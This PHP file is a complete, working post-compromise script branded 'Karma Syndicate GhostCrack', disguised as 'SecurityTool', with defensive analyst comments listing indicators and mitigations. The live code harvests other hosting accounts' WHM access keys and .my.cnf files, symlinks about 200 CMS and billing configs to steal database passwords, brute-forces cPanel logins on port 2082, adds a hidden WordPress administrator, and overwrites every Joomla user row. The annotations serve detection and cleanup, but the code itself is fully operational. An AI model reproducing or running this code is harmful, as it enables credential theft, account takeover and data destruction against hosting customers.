Filename :
60d08bde-2ef3-475b-8223-21f987e3a150.php
<?php
// ANALYST ANNOTATION (defensive): this is a post-compromise script aimed at
// shared hosting. Despite the class name "SecurityTool", every routine below
// reads other accounts' credential files, exposes their CMS configuration
// through symlinks, or writes to their databases. Comments describe what the
// visible code does and which artifacts it leaves, for detection and cleanup.
//
// On-disk indicators taken from this file: directories "ghost_results" and
// "ghost_sym", an .htaccess containing "achon666ju5t.extremecrew", and result
// files named *_results.txt. Database indicators: login 'GhostCrack' and the
// stored hash value '5ae11ae4c4da98d616377f2c1543f796'.

// All error output is suppressed and the execution time limit is lifted, so a
// run leaves nothing in PHP's displayed errors and may be long-lived.
error_reporting(0);
ini_set('display_errors', 0);
ini_set('max_execution_time', 0);

// Self-removal: a request carrying ?action=delete unlinks this script (path is
// rebuilt from DOCUMENT_ROOT plus the request path) and answers with JSON.
// Only the script itself is removed here; the ghost_* directories are not, so
// they remain as evidence. Web access logs showing "action=delete" against a
// file that no longer exists are worth correlating during incident response.
if (isset($_GET['action']) && $_GET['action'] === 'delete') {
    $script_path = $_SERVER['DOCUMENT_ROOT'] . parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH);
    $delete_result = unlink($script_path);
    $response = [
        'status' => $delete_result ? 'success' : 'error',
        'message' => $delete_result ? 'Script deleted successfully' : 'Failed to delete script',
        'file_path' => $script_path,
        'error' => $delete_result ? null : error_get_last()
    ];
    header('Content-Type: application/json');
    echo json_encode($response);
    exit;
}

/**
 * Multi-stage credential harvesting and CMS account takeover routine.
 *
 * Stages, in the order run() calls them: accesshash lookup, .my.cnf lookup,
 * symlink exposure plus cPanel login attempts, WordPress user insertion,
 * Joomla user overwrite. Each stage records success/count/message in $results.
 */
class SecurityTool {
    // Per-stage status. 'message' is the only field echoed back to the caller.
    private $results = [
        'accesshash' => ['success' => false, 'count' => 0, 'message' => ''],
        'cpanel' => ['success' => false, 'count' => 0, 'message' => 'not executed'],
        'symlink' => ['success' => false, 'count' => 0, 'message' => 'not executed'],
        'bruteforce' => ['success' => false, 'count' => 0, 'message' => 'not executed'],
        'wordpress' => ['success' => false, 'count' => 0, 'message' => 'not executed'],
        'joomla' => ['success' => false, 'count' => 0, 'message' => 'not executed']
    ];

    // Relative path: resolved against whatever the working directory is at the
    // time. Several stages chdir() into ghost_sym first, so during cleanup look
    // for "ghost_results" both beside the script and inside ghost_sym.
    private $results_dir = "ghost_results";

    /**
     * Creates the results directory (mode 0755) if it does not exist.
     * Failures are silenced with @.
     */
    private function ensureResultsDir() {
        if (!is_dir($this->results_dir)) {
            @mkdir($this->results_dir, 0755, true);
        }
    }

    /**
     * Stage 1: looks for a readable /home/<user>/.accesshash for every account
     * name in /etc/passwd and appends "WHM <user>:<content>" to
     * ghost_results/accesshash_results.txt.
     *
     * Defender notes: .accesshash is the file name WHM has used for a remote
     * access key, which matches the "WHM" label written here. Any entry in the
     * results file means that key was readable by the web user and should be
     * treated as disclosed and regenerated. The underlying weakness is that
     * another account's home directory is traversable by this process.
     */
    private function accessHashFinder() {
        try {
            // Account enumeration; falls back to the current user only.
            $names = @file('/etc/passwd', FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
            if ($names === false) {
                $names = [$this->getCurrentUser()];
            }
            $this->ensureResultsDir();
            foreach ($names as $name) {
                // First colon-separated field of a passwd line is the login name.
                $user = explode(':', $name)[0];
                $folder = "/home/{$user}/.accesshash";
                if (@is_readable($folder)) {
                    $this->results['accesshash']['count']++;
                    $content = str_replace("\n", "", @file_get_contents($folder));
                    $result_content = "WHM {$user}:{$content}\n";
                    @file_put_contents("{$this->results_dir}/accesshash_results.txt", $result_content, FILE_APPEND);
                }
            }
            $this->results['accesshash']['success'] = $this->results['accesshash']['count'] > 0;
            $this->results['accesshash']['message'] = $this->results['accesshash']['success'] ? 'success' : 'failed';
        } catch (Exception $e) {
            $this->results['accesshash']['message'] = 'failed';
        }
    }

    /**
     * Stage 2: same enumeration as stage 1, but for /home/<user>/.my.cnf, whose
     * full content is appended to ghost_results/cpanel_results.txt.
     *
     * Defender notes: .my.cnf is a MySQL client option file and commonly holds
     * a stored password. Accounts listed in the results file need their
     * database credentials rotated; the file should be readable only by its
     * owner.
     */
    private function cpFinder() {
        try {
            $names = @file('/etc/passwd', FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
            if ($names === false) {
                $names = [$this->getCurrentUser()];
            }
            $this->ensureResultsDir();
            foreach ($names as $name) {
                $user = explode(':', $name)[0];
                $folder = "/home/{$user}/.my.cnf";
                if (@is_readable($folder)) {
                    $this->results['cpanel']['count']++;
                    $content = @file_get_contents($folder);
                    $result_content = "User: {$user}\nContent:\n{$content}\n\n";
                    @file_put_contents("{$this->results_dir}/cpanel_results.txt", $result_content, FILE_APPEND);
                }
            }
            $this->results['cpanel']['success'] = $this->results['cpanel']['count'] > 0;
            $this->results['cpanel']['message'] = $this->results['cpanel']['success'] ? 'success' : 'failed';
        } catch (Exception $e) {
            $this->results['cpanel']['message'] = 'failed';
        }
    }

    /**
     * Stage 3: creates ghost_sym/, drops an .htaccess there, symlinks other
     * accounts' application config files into it under "<user>~<path>.txt",
     * reads them back over HTTP, extracts database passwords, and then submits
     * every user/password combination to the local login form on port 2082.
     *
     * Defender notes (mitigation): this stage depends on the web server
     * following symlinks it does not own and on .htaccess being allowed to set
     * Options and handlers. Apache's SymLinksIfOwnerMatch instead of
     * FollowSymLinks, an AllowOverride that excludes Options, adding symlink to
     * PHP's disable_functions, open_basedir, and per-account filesystem
     * isolation each break it.
     * Defender notes (detection): a new directory containing many
     * "<user>~....txt" symlinks, requests for that directory's index from the
     * server's own address, and bursts of POSTs to /login/ on port 2082 from
     * localhost.
     */
    private function symlinkAndBruteforce() {
        try {
            $names = @file('/etc/passwd', FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
            if ($names === false) {
                $names = [$this->getCurrentUser()];
            }
            if (!@is_dir('ghost_sym')) {
                @mkdir('ghost_sym', 0755, true);
            }
            if (@is_dir('ghost_sym')) {
                // Working directory changes here; relative paths used later in
                // this method resolve inside ghost_sym.
                @chdir('ghost_sym');
                // The .htaccess turns on directory listings and symlink
                // following and maps .php to a text type so linked PHP files
                // are served as source. The DirectoryIndex token is a distinctive
                // string worth searching for across all docroots.
                $htaccess = "Options Indexes FollowSymLinks\nDirectoryIndex achon666ju5t.extremecrew\nAddType txt .php\nAddHandler txt .php";
                @file_put_contents('.htaccess', $htaccess);
            }
            // Relative paths (under each account's public_html) of configuration
            // files for common CMS, forum, shop and billing applications. The
            // list contains duplicates; it is reproduced unchanged. For triage
            // it tells you which applications' secrets were in scope.
            $config_files = [
                "wp-config.php", "wp/wp-config.php", "WP/wp-config.php", "wp/beta/wp-config.php", "beta/wp-config.php", "press/wp-config.php", "wordpress/wp-config.php", "Wordpress/wp-config.php", "blog/wp-config.php", "config.php", "news/wp-config.php", "new/wp-config.php", "blogs/wp-config.php", "home/wp-config.php", "db.php", "site/wp-config.php", "main/wp-config.php", "test/wp-config.php", "configuration.php", "blog/configuration.php", "joomla/configuration.php", "cms/configuration.php", "portal/configuration.php", "news/configuration.php",
                "home/configuration.php", "www/configuration.php", "site/configuration.php", "sites/configuration.php", "vb/includes/config.php", "whm/configuration.php", "central/configuration.php", "whm/whmcs/configuration.php", "whm/WHMCS/configuration.php", "whmc/WHM/configuration.php", "support/configuration.php", "submitticket.php", "whm/configuration.php", "drupal/sites/default/settings.php", "drupal7/sites/default/settings.php", "sites/default/settings.php", "vb/includes/config.php", "includes/config.php", "forum/includes/config.php", "forums/includes/config.php", "cc/includes/config.php", "inc/config.php", "includes/configure.php", "shop/includes/configure.php", "os/includes/configure.php", "oscom/includes/configure.php", "products/includes/configure.php", "cart/includes/configure.php", "inc/conf_global.php", "wp-config.php", "wp/test/wp-config.php", "blog/wp-config.php", "beta/wp-config.php", "portal/wp-config.php", "site/wp-config.php", "wp/wp-config.php", "WP/wp-config.php", "news/wp-config.php", "wordpress/wp-config.php", "test/wp-config.php", "demo/wp-config.php", "home/wp-config.php", "v1/wp-config.php", "v2/wp-config.php", "press/wp-config.php", "new/wp-config.php", "blogs/wp-config.php", "configuration.php", "blog/configuration.php", "submitticket.php", "cms/configuration.php", "beta/configuration.php", "portal/configuration.php", "site/configuration.php", "main/configuration.php", "home/configuration.php", "demo/configuration.php", "test/configuration.php", "v1/configuration.php", "v2/configuration.php", "joomla/configuration.php", "new/configuration.php", "WHMCS/configuration.php", "whmcs1/configuration.php", "whmcs/configuration.php", "WHMC/configuration.php", "whmc/configuration.php", "WHM/configuration.php", "Whm/configuration.php", "whm/configuration.php", "HOST/configuration.php", "Host/configuration.php", "host/configuration.php", "SUPPORTES/configuration.php", "Supportes/configuration.php", "supportes/configuration.php", "domains/configuration.php",
                "domain/configuration.php", "Hosting/configuration.php", "HOSTING/configuration.php", "hosting/configuration.php", "CART/configuration.php", "Cart/configuration.php", "cart/configuration.php", "ORDER/configuration.php", "Order/configuration.php", "order/configuration.php", "CLIENT/configuration.php", "Client/configuration.php", "client/configuration.php", "CLIENTAREA/configuration.php", "Clientarea/configuration.php", "clientarea/configuration.php", "SUPPORT/configuration.php", "Support/configuration.php", "support/configuration.php", "BILLING/configuration.php", "Billing/configuration.php", "billing/configuration.php", "BUY/configuration.php", "Buy/configuration.php", "buy/configuration.php", "MANAGE/configuration.php", "Manage/configuration.php", "manage/configuration.php", "CLIENTSUPPORT/configuration.php", "ClientSupport/configuration.php", "Clientsupport/configuration.php", "clientsupport/configuration.php", "CHECKOUT/configuration.php", "Checkout/configuration.php", "checkout/configuration.php", "BILLINGS/configuration.php", "Billings/configuration.php", "billings/configuration.php", "BASKET/configuration.php", "Basket/configuration.php", "basket/configuration.php", "SECURE/configuration.php", "Secure/configuration.php", "secure/configuration.php", "SALES/configuration.php", "Sales/configuration.php", "sales/configuration.php", "BILL/configuration.php", "Bill/configuration.php", "bill/configuration.php", "PURCHASE/configuration.php", "Purchase/configuration.php", "purchase/configuration.php", "ACCOUNT/configuration.php", "Account/configuration.php", "account/configuration.php", "USER/configuration.php", "User/configuration.php", "user/configuration.php", "CLIENTS/configuration.php", "Clients/configuration.php", "clients/configuration.php", "BILLINGS/configuration.php", "Billings/configuration.php", "billings/configuration.php", "MY/configuration.php", "My/configuration.php", "my/configuration.php", "secure/whm/configuration.php",
                "secure/whmcs/configuration.php", "panel/configuration.php", "clientes/configuration.php", "cliente/configuration.php", "support/order/configuration.php", "bb-config.php", "boxbilling/bb-config.php", "box/bb-config.php", "host/bb-config.php", "Host/bb-config.php", "supportes/bb-config.php", "support/bb-config.php", "hosting/bb-config.php", "cart/bb-config.php", "order/bb-config.php", "client/bb-config.php", "clients/bb-config.php", "cliente/bb-config.php", "clientes/bb-config.php", "billing/bb-config.php", "billings/bb-config.php", "my/bb-config.php", "secure/bb-config.php", "support/order/bb-config.php", "includes/dist-configure.php", "zencart/includes/dist-configure.php", "products/includes/dist-configure.php", "cart/includes/dist-configure.php", "shop/includes/dist-configure.php", "includes/iso4217.php", "hostbills/includes/iso4217.php", "host/includes/iso4217.php", "Host/includes/iso4217.php", "supportes/includes/iso4217.php", "support/includes/iso4217.php", "hosting/includes/iso4217.php", "cart/includes/iso4217.php", "order/includes/iso4217.php", "client/includes/iso4217.php", "clients/includes/iso4217.php", "cliente/includes/iso4217.php", "clientes/includes/iso4217.php", "billing/includes/iso4217.php", "billings/includes/iso4217.php", "my/includes/iso4217.php", "secure/includes/iso4217.php", "support/order/includes/iso4217.php"
            ];
            // One symlink attempt per (account, path) pair; the counter rises
            // whenever symlink() returns true. Link targets therefore identify
            // which accounts were touched even if the read-back failed.
            foreach ($names as $name) {
                $user = explode(':', $name)[0];
                foreach ($config_files as $confurl) {
                    $symlink_path = "{$user}~{$confurl}.txt";
                    if (@symlink("/home/{$user}/public_html/{$confurl}", $symlink_path)) {
                        $this->results['symlink']['count']++;
                    }
                }
            }
            $this->results['symlink']['success'] = $this->results['symlink']['count'] > 0;
            $this->results['symlink']['message'] = $this->results['symlink']['success'] ? 'success' : 'failed';
            if ($this->results['symlink']['success']) {
                // The script requests its own ghost_sym/ listing over HTTPS, so
                // the access log will show the server fetching from itself.
                $url = "https://" . $_SERVER['SERVER_NAME'] . dirname($_SERVER['REQUEST_URI']) . "/ghost_sym/";
                $curl = curl_init();
                curl_setopt_array($curl, [
                    CURLOPT_URL => $url,
                    CURLOPT_RETURNTRANSFER => true,
                    CURLOPT_FOLLOWLOCATION => true,
                    CURLOPT_TIMEOUT => 30
                ]);
                $response = @curl_exec($curl);
                if ($response !== false) {
                    // Every href in the listing that contains ".txt" is fetched.
                    preg_match_all('#<a href="([^"]+)"#', $response, $configs);
                    $passwords_list = '';
                    foreach ($configs[1] as $config) {
                        if (strpos($config, '.txt') !== false) {
                            $file_url = $url . $config;
                            $curl = curl_init();
                            curl_setopt_array($curl, [
                                CURLOPT_URL => $file_url,
                                CURLOPT_RETURNTRANSFER => true,
                                CURLOPT_FOLLOWLOCATION => true,
                                CURLOPT_TIMEOUT => 30
                            ]);
                            $content = @curl_exec($curl);
                            @curl_close($curl);
                            if ($content) {
                                // Database passwords are pulled from the served
                                // source; any account whose config was linked
                                // should have its DB password rotated.
                                $patterns = [
                                    "#'DB_PASSWORD', '(.*?)'#" => 'wordpress',
                                    "#password = '(.*?)'#" => 'joomla'
                                ];
                                foreach ($patterns as $pattern => $type) {
                                    if (preg_match($pattern, $content, $match)) {
                                        $passwords_list .= $match[1] . "\n";
                                        break;
                                    }
                                }
                            }
                        }
                    }
                }
                @curl_close($curl);
                if (!empty($passwords_list)) {
                    // Password-reuse check: every enumerated account name is
                    // paired with every harvested database password.
                    $users = array_filter(explode("\n", trim(implode("\n", array_map(function($name) { return explode(':', $name)[0]; }, $names)))));
                    $passwords = array_filter(explode("\n", trim($passwords_list)));
                    $cpanel_found = 0;
                    $this->ensureResultsDir();
                    foreach ($users as $user) {
                        foreach ($passwords as $pwd) {
                            // Port 2082 is probed, then a login form POST is
                            // sent to it. Login logs for the control panel will
                            // show these as local-origin attempts across many
                            // usernames in a short window.
                            $connection = @fsockopen('localhost', 2082, $errno, $errstr, 5);
                            if ($connection) {
                                fclose($connection);
                                $curl = curl_init();
                                curl_setopt_array($curl, [
                                    CURLOPT_URL => "http://localhost:2082/login/",
                                    CURLOPT_POST => true,
                                    CURLOPT_POSTFIELDS => http_build_query(['user' => $user, 'pass' => $pwd]),
                                    CURLOPT_RETURNTRANSFER => true,
                                    CURLOPT_TIMEOUT => 10,
                                    CURLOPT_FOLLOWLOCATION => false
                                ]);
                                $response = @curl_exec($curl);
                                // Pairs recorded here are credentials the script
                                // considered valid; treat each listed account as
                                // compromised.
                                if ($response !== false && strpos($response, 'Location: /cpsess') !== false) {
                                    $cpanel_found++;
                                    @file_put_contents("{$this->results_dir}/bruteforce_results.txt", "User: {$user}\nPassword: {$pwd}\n\n", FILE_APPEND);
                                }
                                @curl_close($curl);
                            }
                        }
                    }
                    $this->results['bruteforce']['success'] = $cpanel_found > 0;
                    $this->results['bruteforce']['count'] = $cpanel_found;
                    $this->results['bruteforce']['message'] = $this->results['bruteforce']['success'] ? 'success' : 'failed';
                } else {
                    $this->results['bruteforce']['message'] = 'failed';
                }
            }
        } catch (Exception $e) {
            $this->results['symlink']['message'] = 'failed';
            $this->results['bruteforce']['message'] = 'failed';
        }
    }

    /**
     * Stage 4: for each exposed "wp-config.php.txt" in ghost_sym/, connects to
     * that site's database with the credentials found in the file and inserts
     * a user row plus administrator capability rows.
     *
     * Defender notes: search every WordPress users table on the host for
     * user_login 'GhostCrack', user_email 'email@example.com', or the user_pass
     * value shown below (32 hex characters; looks like an unsalted digest, not
     * verified here). The plaintext written to wordpress_results.txt is the
     * operator's own note and is likewise unverified. Affected sites also need
     * new database credentials because wp-config.php was read.
     *
     * @param string $symlink_path Absolute path of ghost_sym, used only to chdir.
     */
    private function wpMassUserAdder($symlink_path) {
        try {
            // Runs only when stage 3 created at least one symlink.
            if (!$this->results['symlink']['success']) {
                $this->results['wordpress']['message'] = 'failed';
                return;
            }
            $url = "https://" . $_SERVER['SERVER_NAME'] . dirname($_SERVER['REQUEST_URI']) . "/ghost_sym/";
            $curl = curl_init();
            curl_setopt_array($curl, [CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true]);
            $response = @curl_exec($curl);
            @curl_close($curl);
            if ($response === false) {
                $this->results['wordpress']['message'] = 'failed';
                return;
            }
            preg_match_all('#<a href="([^"]+)"#', $response, $configs);
            foreach ($configs[1] as $config) {
                if (strpos($config, 'wp-config.php.txt') !== false) {
                    // After this chdir the relative results path below resolves
                    // inside ghost_sym.
                    @chdir($symlink_path);
                    $curl = curl_init();
                    curl_setopt_array($curl, [CURLOPT_URL => $url . $config, CURLOPT_RETURNTRANSFER => true]);
                    $content = @curl_exec($curl);
                    @curl_close($curl);
                    if ($content) {
                        // Connection settings are parsed out of the served
                        // wp-config source.
                        preg_match("#'DB_HOST', '(.*?)'#", $content, $host);
                        preg_match("#'DB_PASSWORD', '(.*?)'#", $content, $pass);
                        preg_match("#'DB_USER', '(.*?)'#", $content, $user);
                        preg_match("#'DB_NAME', '(.*?)'#", $content, $name);
                        preg_match("#table_prefix\s*= '(.*?)'#", $content, $prefix);
                        if ($host && $user && $pass && $name && $prefix) {
                            $connect = @mysqli_connect($host[1], $user[1], $pass[1], $name[1]);
                            if ($connect) {
                                $prefix = $prefix[1];
                                // Rows written to <prefix>users and
                                // <prefix>usermeta; these literal values are the
                                // database-side indicators to hunt for.
                                $queries = [
                                    "INSERT INTO `{$prefix}users` (`user_login`, `user_pass`, `user_nicename`, `user_email`, `user_status`) VALUES ('GhostCrack', '5ae11ae4c4da98d616377f2c1543f796', 'firstname lastname', 'email@example.com', '0')",
                                    "INSERT INTO `{$prefix}usermeta` (`user_id`, `meta_key`, `meta_value`) VALUES (LAST_INSERT_ID(), '{$prefix}capabilities', 'a:1:{s:13:\"administrator\";s:1:\"1\";}')",
                                    "INSERT INTO `{$prefix}usermeta` (`user_id`, `meta_key`, `meta_value`) VALUES (LAST_INSERT_ID(), '{$prefix}user_level', '10')"
                                ];
                                $success = true;
                                foreach ($queries as $query) {
                                    $success = $success && @mysqli_query($connect, $query);
                                }
                                $siteurl_query = @mysqli_query($connect, "SELECT `option_value` FROM `{$prefix}options` WHERE `option_name`='siteurl'");
                                $siteurl = $siteurl_query ? @mysqli_fetch_array($siteurl_query, MYSQLI_ASSOC)['option_value'] : '';
                                // The results file lists each affected site URL,
                                // which gives responders the victim list.
                                if ($success && $siteurl) {
                                    $this->results['wordpress']['count']++;
                                    @file_put_contents("{$this->results_dir}/wordpress_results.txt", "URL: {$siteurl}/wp-login.php\nUsername: GhostCrack\nPassword: Karma@Syndicate#GhostCrack\n\n", FILE_APPEND);
                                }
                                @mysqli_close($connect);
                            }
                        }
                    }
                }
            }
            $this->results['wordpress']['success'] = $this->results['wordpress']['count'] > 0;
            $this->results['wordpress']['message'] = $this->results['wordpress']['success'] ? 'success' : 'failed';
        } catch (Exception $e) {
            $this->results['wordpress']['message'] = 'failed';
        }
    }

    /**
     * Stage 5: for each exposed "configuration.php.txt" in ghost_sym/, connects
     * to that Joomla site's database and runs an UPDATE on <prefix>users.
     *
     * Defender notes: the UPDATE has no WHERE clause, so it sets username and
     * password on every row of the users table, not on one account. Impact is
     * destructive: all legitimate logins are overwritten and recovery needs the
     * users table restored from a known-good backup. A users table where every
     * row has username 'administrator' and the same password value is a strong
     * indicator of this script. joomla_results.txt lists affected hosts, taken
     * from the domain part of the site's mailfrom setting.
     *
     * @param string $symlink_path Absolute path of ghost_sym, used only to chdir.
     */
    private function joomlaMassUserChanger($symlink_path) {
        try {
            // Runs only when stage 3 created at least one symlink.
            if (!$this->results['symlink']['success']) {
                $this->results['joomla']['message'] = 'failed';
                return;
            }
            $url = "https://" . $_SERVER['SERVER_NAME'] . dirname($_SERVER['REQUEST_URI']) . "/ghost_sym/";
            $curl = curl_init();
            curl_setopt_array($curl, [CURLOPT_URL => $url, CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true]);
            $response = @curl_exec($curl);
            @curl_close($curl);
            if ($response === false) {
                $this->results['joomla']['message'] = 'failed';
                return;
            }
            preg_match_all('#<a href="([^"]+)"#', $response, $configs);
            foreach ($configs[1] as $config) {
                if (strpos($config, 'configuration.php.txt') !== false) {
                    @chdir($symlink_path);
                    $curl = curl_init();
                    curl_setopt_array($curl, [CURLOPT_URL => $url . $config, CURLOPT_RETURNTRANSFER => true]);
                    $content = @curl_exec($curl);
                    @curl_close($curl);
                    if ($content) {
                        // Connection settings and the mailfrom address are
                        // parsed out of the served configuration source.
                        preg_match('#\$host = \'(.*?)\'#i', $content, $host);
                        preg_match('#\$password = \'(.*?)\'#i', $content, $pass);
                        preg_match('#\$user = \'(.*?)\'#i', $content, $user);
                        preg_match('#\$db = \'(.*?)\'#i', $content, $name);
                        preg_match('#\$dbprefix = \'(.*?)\'#i', $content, $prefix);
                        preg_match("#mailfrom = '(.*?)@(.*?)'#i", $content, $site_url);
                        if ($host && $user && $pass && $name && $prefix && $site_url) {
                            $con = @mysqli_connect($host[1], $user[1], $pass[1], $name[1]);
                            if ($con) {
                                // Table-wide overwrite (no WHERE clause).
                                $query = "UPDATE {$prefix[1]}users SET username='administrator', password='5ae11ae4c4da98d616377f2c1543f796'";
                                if (@mysqli_query($con, $query)) {
                                    $this->results['joomla']['count']++;
                                    @file_put_contents("{$this->results_dir}/joomla_results.txt", "URL: http://{$site_url[2]}/administrator\nUsername: administrator\nPassword: Karma@Syndicate#GhostCrack\n\n", FILE_APPEND);
                                }
                                @mysqli_close($con);
                            }
                        }
                    }
                }
            }
            $this->results['joomla']['success'] = $this->results['joomla']['count'] > 0;
            $this->results['joomla']['message'] = $this->results['joomla']['success'] ? 'success' : 'failed';
        } catch (Exception $e) {
            $this->results['joomla']['message'] = 'failed';
        }
    }

    /**
     * Returns the name of the account PHP is running as: via the posix
     * functions when both exist, else $_SERVER['USER'], else 'unknown'.
     * Used as the only enumeration entry when /etc/passwd cannot be read.
     */
    private function getCurrentUser() {
        return function_exists('posix_getpwuid') && function_exists('posix_getuid') ? posix_getpwuid(posix_getuid())['name'] : (isset($_SERVER['USER']) ? $_SERVER['USER'] : 'unknown');
    }

    /**
     * Sends a text/plain summary: a banner line followed by one
     * "<STAGE>: <message>" line per stage. Harvested data is not echoed; it
     * stays in the result files on disk. The banner text is a fixed string and
     * can serve as a response-body signature for proxy or WAF rules.
     */
    private function outputResults() {
        header('Content-Type: text/plain');
        echo "=== Karma Syndicate GhostCrack Results ===\n\n";
        foreach ($this->results as $key => $result) {
            echo strtoupper($key) . ": " . $result['message'] . "\n";
        }
    }

    /**
     * Entry point. Runs stage 1 first; stages 2 and 3 run only when stage 1
     * found nothing, and stages 4 and 5 only when stage 3 created at least one
     * symlink. The working directory is reset to its starting value after each
     * stage. For scoping an incident: stages left at 'not executed' in the
     * output were skipped by this gating, not blocked by a control.
     */
    public function run() {
        $base_dir = getcwd();
        $symlink_path = $base_dir . "/ghost_sym";
        $this->accessHashFinder();
        @chdir($base_dir);
        if (!$this->results['accesshash']['success']) {
            $this->cpFinder();
            @chdir($base_dir);
            $this->symlinkAndBruteforce();
            @chdir($base_dir);
            if ($this->results['symlink']['success']) {
                $this->wpMassUserAdder($symlink_path);
                @chdir($base_dir);
                $this->joomlaMassUserChanger($symlink_path);
                @chdir($base_dir);
            }
        }
        $this->outputResults();
    }
}

// Executes on every request that does not carry action=delete; there is no
// authentication check anywhere in this file, so any request to the script's
// URL triggers a full run.
$tool = new SecurityTool();
$tool->run();